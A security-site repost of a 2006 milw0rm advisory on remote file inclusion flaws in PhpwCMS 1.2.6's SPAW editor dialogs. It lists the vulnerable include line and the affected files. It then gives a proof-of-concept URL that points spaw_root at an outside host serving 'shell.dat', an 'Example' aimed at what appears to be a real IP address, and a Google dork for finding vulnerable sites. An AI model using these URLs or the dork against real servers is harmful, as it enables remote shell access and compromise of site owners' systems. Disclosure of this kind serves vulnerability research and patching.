Computer Security

Security Advisory: PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21430] hitweb "REP_INC" File Inclusion Vulnerability

  [SA21424] Ruby on Rails Unspecified Vulnerability

  [SA21435] Drupal Bibliography Module Cross-Site Scripting and SQL Injection

  [SA21438] MojoGallery "admin.
cgi" Cross-Site Scripting Vulnerabilities

From:MORGAN
Date:10.08.2006
Subject:PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Discovered by :

|\/| _ ._ _  _.._
|  |(_)| (_|(_|| |
         _|



Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmo
rgan.net/shell.dat?

Example:
http://132.195.14.67/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=h
ttp://ehmorgan.net/shell.dat?

Google Dork:

inurl:"phpwcms/index.php?id="

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan

# milw0rm.com [2006-08-10]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru